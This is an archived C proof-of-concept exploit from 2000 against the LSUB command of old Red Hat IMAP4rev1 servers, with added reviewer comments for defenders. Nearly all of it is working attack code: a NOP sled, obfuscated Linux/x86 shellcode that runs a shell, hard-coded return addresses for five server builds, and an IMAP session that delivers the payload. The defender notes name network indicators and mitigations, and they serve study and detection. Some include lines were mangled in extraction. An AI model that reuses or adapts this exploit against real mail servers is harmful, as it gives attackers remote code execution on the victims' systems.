/*
 * Exploit by Narrow (29 September 2000)
 *
 * Archived proof-of-concept that writes an IMAP session to stdout: a LOGIN
 * followed by an LSUB whose second argument is a 1064-byte literal. The
 * literal is built like a classic stack-smash payload (0x90 filler, embedded
 * machine code, then a repeated 32-bit address), so the flaw is presumably a
 * stack buffer overflow in the LSUB handling of the server builds listed in
 * types[] below. Confirm against the vendor advisory for those packages.
 *
 * Reviewer notes for defenders:
 *  - The LSUB is sent only after "1 LOGIN <user> <pass>", so as written the
 *    program needs valid mailbox credentials; the flaw is post-authentication.
 *  - Network indicators visible in this listing: an LSUB command carrying a
 *    literal marker of {1064} for the mailbox pattern, and a long run of 0x90
 *    bytes inside that literal. Alerting on oversized LSUB/LIST literals is
 *    more robust than matching the exact size.
 *  - The embedded code stores its path string with several bytes lowered by
 *    0x30 and restores them at run time, so a plain-text match on a shell
 *    path will not fire on this payload.
 *  - Every target row hard-codes a stack address in the 0xbffffxxx range; the
 *    technique depends on a predictable, executable stack. Address-space
 *    randomisation and non-executable stacks break that assumption, and
 *    upgrading the IMAP server package removes the underlying bug.
 *
 * NOTE(review): the header names after the two #include directives were lost
 * when this page was extracted; the listing is kept as found.
 */
#include #include

/* One row per supported target build. */
struct types {
    char *imapver;          /* human-readable distro / server version label */
    unsigned long ret_addr; /* address written repeatedly into the tail of the payload */
    int offset;             /* subtracted from ret_addr before it is written */
};

/* Target table; the {NULL,0,0} row terminates it. All offsets are 0 here. */
struct types types[] = {
    {"Red Hat 6.2 - IMAP4rev1 v12.264",0xbffff2c8,0},
    {"Red Hat 6.1 - IMAP4rev1 v12.250",0xbffff2c4,0},
    {"Red Hat 6.0 - IMAP4rev1 v12.250",0xbffff2f0,0},
    {"Red Hat 5.2 - IMAP4rev1 v11.241",0xbffff320,0},
    {"Red Hat 5.1 - IMAP4rev1 v10.223",0xbffff31c,0},
    {NULL,0,0}
};

/*
 * Machine code placed inside the payload (per the original author, taken
 * from imapx.c). It appears to be Linux/x86 code that issues an execve
 * system call (int 0x80 with AL = 0x0b) and then exits; the trailing seven
 * bytes are the obfuscated path string it patches in place before the call.
 */
char shellcode[] = /* shellcode from imapx.c */
    "\xeb\x35\x5e\x80\x46\x01\x30\x80\x46\x02\x30\x80\x46\x03\x30"
    "\x80\x46\x05\x30\x80\x46\x06\x30\x89\xf0\x89\x46\x08\x31\xc0"
    "\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56"
    "\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xc6\xff\xff\xff"
    "\x2f\x32\x39\x3e\x2f\x43\x38";

/*
 * Builds the 1064-byte payload and prints the LOGIN and LSUB commands plus
 * the payload to stdout. Nothing in this file opens a socket, so the output
 * is presumably piped to a separate network client.
 *
 * argv[1], argv[2]: user name and password echoed into the LOGIN line.
 * argv[3]:          index into types[], parsed with atoi().
 * Returns 0 after printing the usage text; otherwise falls off the end of
 * main after writing the session.
 */
int main(int argc, char **argv)
{
    char buf[1064];
    int i,type;

    /* Usage text plus the list of the five target labels. The argument
     * names in the usage string look to have been stripped by the page
     * extraction (only "%s " remains). */
    if(argc < 3)
    {
        printf("Usage: %s \n\n", argv[0]);
        printf("Type:\n");
        for(i=0; i<=4; i++)
            printf("%d - %s\n", i, types[i].imapver);
        return 0;
    }

    /* Selected target row; atoi() gives no error reporting and the index
     * is not range-checked against the table. */
    type = atoi(argv[3]);

    /* First 1032 bytes are set to 0x90, the x86 NOP opcode. */
    memset(buf, 0x90, 1032);

    /* The machine code is copied in at byte offset 613, without its NUL. */
    memcpy(buf+613, shellcode, strlen(shellcode));

    /* From the end of the machine code up to the loop bound 1064, a long is
     * stored at every fourth offset holding ret_addr - offset for the chosen
     * row. The step of 4 assumes a 4-byte long, i.e. a 32-bit build. */
    for(i=strlen(shellcode)+613; i<=1064; i+=4)
        *(long *)&buf[i] = (unsigned long)types[type].ret_addr - types[type].offset;

    /* IMAP session: tagged LOGIN, then LSUB with an empty reference and a
     * literal of declared length 1064 followed by the raw payload bytes. */
    printf("1 LOGIN %s %s\r\n", argv[1], argv[2]);
    printf("1 LSUB \"\" {1064}\r\n");
    for(i=0; i<1064; i++)
        putchar(buf[i]);
    printf("\r\n");
}
/* www.hack.co.za [23 April 2001]*/